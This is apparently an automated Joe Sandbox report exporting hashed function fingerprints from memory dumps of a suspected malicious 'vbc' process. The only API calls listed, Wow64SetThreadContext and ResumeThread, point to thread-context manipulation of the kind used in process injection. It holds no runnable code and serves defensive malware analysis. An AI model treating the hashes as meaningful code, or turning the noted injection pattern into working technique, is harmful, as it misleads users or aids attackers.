                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 009001E7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 009001E7
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ResumeThread.KERNELBASE(?), ref: 009000C6
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.484845591.0000000000900000.00000040.00000001.sdmp, Offset: 00900000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_900000_vbc.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6
                                                    • API String ID: 0-1003354411
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: *6
                                                    • API String ID: 0-3775417166
                                                    • Opcode ID: 09f5d671159d2c5ab27f7c7d5ce9344a7b397f1c0ba64613513193a87b583efa
                                                    • Instruction ID: 0fddb369c41f6c7d9a47a8630e87a0027b5319156107a018a31a0256754be94e
                                                    • Opcode Fuzzy Hash: 09f5d671159d2c5ab27f7c7d5ce9344a7b397f1c0ba64613513193a87b583efa
                                                    • Instruction Fuzzy Hash: C2F046393041801FC302E76DA400A6D77D99B8620470940AAE445CB3A7EE20DD0ACBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b4f0d2772e0a1356e8bc3a0f413ad6db1b5e9f796f24a303c4fbc9a85bdd29c3
                                                    • Instruction ID: e88810889ae8c8b3401265bdfa74dc2341a85060d8c65669d1497663723f9d0d
                                                    • Opcode Fuzzy Hash: b4f0d2772e0a1356e8bc3a0f413ad6db1b5e9f796f24a303c4fbc9a85bdd29c3
                                                    • Instruction Fuzzy Hash: 5BB1A174A6C1858FCB00CFAAC880ABDFBF1AF49300F9985A6E455EB292D374DD51CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d1b080889f9927b828d95769af2c507a85f3ceef5bce126b81d142427b104b4a
                                                    • Instruction ID: ccb35e23c1a11e1824003d42b1bfa194aa2b307b102f35c89a208690c13ca9bb
                                                    • Opcode Fuzzy Hash: d1b080889f9927b828d95769af2c507a85f3ceef5bce126b81d142427b104b4a
                                                    • Instruction Fuzzy Hash: 1A91E330E6C2C6CFD7008F6AC8446ADBBB1EF46300F58456BD065DB282D378D961DB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5f329ecd6e7fd4fecad0bf9cc023e3a16e3b6c2a559c2c80aa9b5000808e0157
                                                    • Instruction ID: d8535b6082d45c03286316b865b9a4826a01b85234dad685f780b94ac7df2ae4
                                                    • Opcode Fuzzy Hash: 5f329ecd6e7fd4fecad0bf9cc023e3a16e3b6c2a559c2c80aa9b5000808e0157
                                                    • Instruction Fuzzy Hash: 6481D27196C2C58FCB018F7AC8402BABBF5EF46310FA845ABD155DB296D3748D21CBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03f53a91afe132694e8fb1cada7fb9c82163ebdb760394fc0144fa251044d34d
                                                    • Instruction ID: 0fa430c7c6096cad57d91573e8a02aea406eca4f21ddeb44abedbb35686700a1
                                                    • Opcode Fuzzy Hash: 03f53a91afe132694e8fb1cada7fb9c82163ebdb760394fc0144fa251044d34d
                                                    • Instruction Fuzzy Hash: A971243196C2D5CFCB01CF6AC8906A97FB1AF42300F5940E7E955DB2D2D3748925DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ed703ef0fe47a1dce5c121324028c8314e8d773deee67d5b35dc738ced66cc3
                                                    • Instruction ID: 4c585b9854636e5ba4ae34562583df7958580e2538f213044fbaf367b2f0eb1e
                                                    • Opcode Fuzzy Hash: 0ed703ef0fe47a1dce5c121324028c8314e8d773deee67d5b35dc738ced66cc3
                                                    • Instruction Fuzzy Hash: 6D51E430B58249DFDB04DFA5CC467AEB7B2EF89345F50822AE101AB791DB709911CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d911116ec8c8dffc1acf26ab8d52f0303f7b3c6f930fee7abbf555b38e28f5e
                                                    • Instruction ID: 7b9b9317346c4325d804a879fc87331b38af0d6b52acf8f26c0990074d9788c8
                                                    • Opcode Fuzzy Hash: 5d911116ec8c8dffc1acf26ab8d52f0303f7b3c6f930fee7abbf555b38e28f5e
                                                    • Instruction Fuzzy Hash: 9E512B78D5010A9FDF10CFAAD880AEEBBB1BF89304F10A669D401FB254DB71AA45CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cf19188177996780305518987c57f4f3933cfa01087c70e66805b9334f143a30
                                                    • Instruction ID: 48b2727b63c4f6fc45728dfc9b36c58d690556a963569b67bff411094d6b56eb
                                                    • Opcode Fuzzy Hash: cf19188177996780305518987c57f4f3933cfa01087c70e66805b9334f143a30
                                                    • Instruction Fuzzy Hash: 7B41FC31B192A18FD7159B3A8890969BFA59F87304B59C0FFE549CF253C535CC0AC760
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0ab24b760e54f58ea88e2eceabcf38222cd93924b25966c91d73afcc26cab6e3
                                                    • Instruction ID: 48fe99d6975f08f5715e4e9a2e36cc4044cad0bd7e4a77bed0358bf0783f63bc
                                                    • Opcode Fuzzy Hash: 0ab24b760e54f58ea88e2eceabcf38222cd93924b25966c91d73afcc26cab6e3
                                                    • Instruction Fuzzy Hash: 1531B33196C295CFCB44CF6AD8412AEBBF1FF49320F9881A7E415EB255D3348D618BA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4a4c978987799acd7ae1d0f38f58fe4d6c395e0f78bba5f93d01abb9e4c64377
                                                    • Instruction ID: 7d334132fd1589c040c7b97fa8a91aace5d89902c073b8b62dd96fefa0951f11
                                                    • Opcode Fuzzy Hash: 4a4c978987799acd7ae1d0f38f58fe4d6c395e0f78bba5f93d01abb9e4c64377
                                                    • Instruction Fuzzy Hash: FA3137B4D502899FDF00DFA9D8487EEBBB0FB0A305F50842AD50AA7290D7B859D4CF65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 03b1e2666745c0acb967a4d073b4c6e6a6ff1c3322753afa221a818286355e2f
                                                    • Instruction ID: 2510ea1182476de1e7baabdff9c8e6a4c65c85e69869a7f90f3910e36cdad809
                                                    • Opcode Fuzzy Hash: 03b1e2666745c0acb967a4d073b4c6e6a6ff1c3322753afa221a818286355e2f
                                                    • Instruction Fuzzy Hash: 4B31E234E1024D9FCB44CFA9D594AEEBBF1AF48310F60902AE905A7360DB30A951CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 801b74f8ed43a2c991e51d509651fe7eb8f721b9d57e8b8b868dbf062e82cbae
                                                    • Instruction ID: 909eacbc0750e9501c71b76a8a62cdc70eb13a811c3cb0eec6d5974845490251
                                                    • Opcode Fuzzy Hash: 801b74f8ed43a2c991e51d509651fe7eb8f721b9d57e8b8b868dbf062e82cbae
                                                    • Instruction Fuzzy Hash: 2421B3357546509FD7185B64E89CA2D3BA2EB89305F54803AE503CB7E2DF74CE828B11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483615473.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d739d799257ba5798c9b8663a9ba259ee4696ee1e23c02e182e4e6c556b6f1ad
                                                    • Instruction ID: 5ed4a8de8282d59aa24b12771328c867fc937fef1d7ed07df4826f20188384d8
                                                    • Opcode Fuzzy Hash: d739d799257ba5798c9b8663a9ba259ee4696ee1e23c02e182e4e6c556b6f1ad
                                                    • Instruction Fuzzy Hash: DE21F275608344DFDB15EF10E884B2ABB65EB88314F34C569F9494B286C73AD906CB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483615473.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 487b33ae9248c8340b9ad656b3b7a7c5f04b116b91cdb3d7c17c1afac1e3930b
                                                    • Instruction ID: 8279d700dd0d790425d2c5e4e00c7a72957fce3f8471600a58a4e33d92e603bd
                                                    • Opcode Fuzzy Hash: 487b33ae9248c8340b9ad656b3b7a7c5f04b116b91cdb3d7c17c1afac1e3930b
                                                    • Instruction Fuzzy Hash: 0A210475604344EFDB05EF10E9C4B2ABBA6FB88314F24C66DE9094B286C736D906CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0f824a0484a848a4d0fc1b62db0e488be4de1a66976cd00def75fe72cf051a77
                                                    • Instruction ID: c5ac59c712202dbfd1aea4b780a5133cec99eb9b62ba13167160fe4e8de3249f
                                                    • Opcode Fuzzy Hash: 0f824a0484a848a4d0fc1b62db0e488be4de1a66976cd00def75fe72cf051a77
                                                    • Instruction Fuzzy Hash: 19119671A0D3D45FD7228F7A4C51956BFB99F8761030A40EBE544CF263D920CC09C7A1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483615473.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3aa95179fc39f5a28a4e7e43a98a9d2df4162a87b6c428829bacabebdc3b3b4
                                                    • Instruction ID: 94ac23e4e9b40af5977799d0b58cc5b71c11686b2942ef71307606b4e868b86f
                                                    • Opcode Fuzzy Hash: f3aa95179fc39f5a28a4e7e43a98a9d2df4162a87b6c428829bacabebdc3b3b4
                                                    • Instruction Fuzzy Hash: 5311BB75904284DFCB02DF10E5C4B15BBA2FB84314F28C6A9D8094B296C33AD90ACF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483615473.000000000018D000.00000040.00000001.sdmp, Offset: 0018D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_18d000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f3aa95179fc39f5a28a4e7e43a98a9d2df4162a87b6c428829bacabebdc3b3b4
                                                    • Instruction ID: eaeae316e7d10e0bab9d2d707baf0bc3644ab65fa2821b2f4df6a88bc7a27afc
                                                    • Opcode Fuzzy Hash: f3aa95179fc39f5a28a4e7e43a98a9d2df4162a87b6c428829bacabebdc3b3b4
                                                    • Instruction Fuzzy Hash: E411BE75504384CFCB11DF10E584B15BB61FB44314F24C6A9E8094B696C33AD90ACFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1fdf6a3cf8591c64347aed85a5dd303b7526742862ae45e5d222f081cd6ea1db
                                                    • Instruction ID: 374b8e0e4c6d9b8700baa774ea10ec7b71b6940242cf6385ebadacfd0b0da1c5
                                                    • Opcode Fuzzy Hash: 1fdf6a3cf8591c64347aed85a5dd303b7526742862ae45e5d222f081cd6ea1db
                                                    • Instruction Fuzzy Hash: 00011B757500504F8788EB7DD558D2E37E39F8D21436201B8E60ADB362DE20DD568B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1ae05af3f575a5d918bacd7dfc1b8c2c9a9485f5c7c6d80a395f3ac24eb1f6f6
                                                    • Instruction ID: 7edd99d14e0e82716caf7222123ff057219914e07e3dca937349c48c2e4000e7
                                                    • Opcode Fuzzy Hash: 1ae05af3f575a5d918bacd7dfc1b8c2c9a9485f5c7c6d80a395f3ac24eb1f6f6
                                                    • Instruction Fuzzy Hash: BA0129757501508F8788EB7DD558D2E37E7AF8D22436200B8E60ADB362EF30ED568B90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1988f2a6a84d5468851c8deb0d8922985c4b24caad2017a95058aba8aff70037
                                                    • Instruction ID: 87bae0b66573d3db42b8faf3f8224913e40ddfceeee38208fe006ae8a58ecf6b
                                                    • Opcode Fuzzy Hash: 1988f2a6a84d5468851c8deb0d8922985c4b24caad2017a95058aba8aff70037
                                                    • Instruction Fuzzy Hash: DB0192316142108BC744EF3AD890AADB396FFC9304B5584B9E90E9F226DB349C05C7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f4bf0b92e0dcd3c87d972259b3ee56343bf4dcff31559e26095564757e83a6bf
                                                    • Instruction ID: bd1ab0a68aca14dea079d3efb96a7ecee60610bf3cdae055b5bf54bee0da1490
                                                    • Opcode Fuzzy Hash: f4bf0b92e0dcd3c87d972259b3ee56343bf4dcff31559e26095564757e83a6bf
                                                    • Instruction Fuzzy Hash: 19014B3052D3C58FC353ABB998A88687F70EE0360536A45DBD0D5CB5FBD2288909C712
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c92affd5bc73fb4671889d6717bd5f296282fd76bed85271bbe3f76f6d5b19ef
                                                    • Instruction ID: 887ea0f7d021a6d55d86457d2ee2bd7ec0b452e2af684466fa7ca9dde5a4ba97
                                                    • Opcode Fuzzy Hash: c92affd5bc73fb4671889d6717bd5f296282fd76bed85271bbe3f76f6d5b19ef
                                                    • Instruction Fuzzy Hash: 2901BC353580904FC789EB7C9894D2D3BF29FCD21436601B9E54ADB3B3EE209E568B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483583276.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_cd000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f8fa6b42ae1d633e81369a0d271ce0ed12e155894c6a3337e8eae114b9c2b91a
                                                    • Instruction ID: b9ffa1086d8b555437e3cb7b39324428d6bcad899ee2e7bc5281190f361545f0
                                                    • Opcode Fuzzy Hash: f8fa6b42ae1d633e81369a0d271ce0ed12e155894c6a3337e8eae114b9c2b91a
                                                    • Instruction Fuzzy Hash: 45018471008644AAD7A15B15C884F6FBBD8DF51764F28846FEE445A286C378DC40C6B1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b8d6be1da1a032ace8e0fa103f5cf865e0e38f2267c659e28f2acf404a3bc622
                                                    • Instruction ID: 67389391b632af767e2ff4e50d605cc4e4bede0a1e94825b96775c444481b851
                                                    • Opcode Fuzzy Hash: b8d6be1da1a032ace8e0fa103f5cf865e0e38f2267c659e28f2acf404a3bc622
                                                    • Instruction Fuzzy Hash: FA017134A502498BDB14DBA5C594BEEBBF5AB4C304F64002AD401F7784DBB5A985CFE0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f56f14015a4daafe66bf2163e562bc1438e7ed389e78d4e5ed6126bdfd35b738
                                                    • Instruction ID: a99731cb2047a04893c96e1a063c338bf003aec5953161b917b7c6b7ecd379b4
                                                    • Opcode Fuzzy Hash: f56f14015a4daafe66bf2163e562bc1438e7ed389e78d4e5ed6126bdfd35b738
                                                    • Instruction Fuzzy Hash: 970181357442904FC746AB3D981491D3BF2DFCA25031600AAE945DB362EE30AE55CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3aac3e4032da1737eeac60314a9c13da7b62d1b2b0477c04be9c866e8eb2d32f
                                                    • Instruction ID: 549ff5f32a49eb6b0ae42d8cb8cf5f1eea6ead54b22f83e8baeb3a5e40b40936
                                                    • Opcode Fuzzy Hash: 3aac3e4032da1737eeac60314a9c13da7b62d1b2b0477c04be9c866e8eb2d32f
                                                    • Instruction Fuzzy Hash: DEF019353500508F8388EB7CD458D2E36E69F8C6243520178E60ADB362EF20DE568B91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3a8ad220cfd12471d63fe6cc157b08fd0114444e9e26a98a2bedb75b61070c4e
                                                    • Instruction ID: 72aa840db31f43c095cd12713b20b36a9c5da33e3ef2ed816e892453fb254269
                                                    • Opcode Fuzzy Hash: 3a8ad220cfd12471d63fe6cc157b08fd0114444e9e26a98a2bedb75b61070c4e
                                                    • Instruction Fuzzy Hash: D0F0C232A141508FCB14DF2BD8C0DEEB795AFD8304B4881B9D90DDF126DA708C058AA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483583276.00000000000CD000.00000040.00000001.sdmp, Offset: 000CD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_cd000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f82cf7efccb92392a80d9f27d545434c5c8501280c35e508f17b291789f3ae5a
                                                    • Instruction ID: 020626c27c839660481fb88ae924a51a53563fc975ab60a742b176688831e972
                                                    • Opcode Fuzzy Hash: f82cf7efccb92392a80d9f27d545434c5c8501280c35e508f17b291789f3ae5a
                                                    • Instruction Fuzzy Hash: 95F0AF71004644AAE7508B05D888B66FFD8EBA1764F18C45EED081B286C3789C40CAB1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2f45a5f316a6d9ba4761a86c4289475485c625f5049aeb6c418ec2ada4f84ac
                                                    • Instruction ID: 18b3e191f0c1a2074e6cd039d1ea52655325afe59eedcb8b00049f8d74b8fef7
                                                    • Opcode Fuzzy Hash: b2f45a5f316a6d9ba4761a86c4289475485c625f5049aeb6c418ec2ada4f84ac
                                                    • Instruction Fuzzy Hash: F6F020317401445EDB04FA7BAC84CAA7BEACF89344B414078E201D32A1EB3088248A81
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1abac364bf69851389c4bed785d85f7406515e3a834fbacc0b164fe417b69654
                                                    • Instruction ID: b1032e05b5cb35e11a7a51fba74e5e57936e332dd20d7ea0808e81a1b27255aa
                                                    • Opcode Fuzzy Hash: 1abac364bf69851389c4bed785d85f7406515e3a834fbacc0b164fe417b69654
                                                    • Instruction Fuzzy Hash: E3018B749592C99FDF00DF64DC487DDBBB0BB06305F1004ABD686A6295CBB50884CF29
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 9b3f4fcc70bb8ff340f3543b092ecd8a3c48388602904584737abb24a26ac6d9
                                                    • Instruction ID: ea69e87ed52300b52c6fa4aa41850b0d7339d6065a91dc5bbd04b34a3dfa9a79
                                                    • Opcode Fuzzy Hash: 9b3f4fcc70bb8ff340f3543b092ecd8a3c48388602904584737abb24a26ac6d9
                                                    • Instruction Fuzzy Hash: 6EF0A72030C2D01FC71A63B5581576E3FDA4F8645171940AFD14ACB6E3DF255D0983A6
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.483654308.00000000002E0000.00000040.00000001.sdmp, Offset: 002E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_2e0000_vbc.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
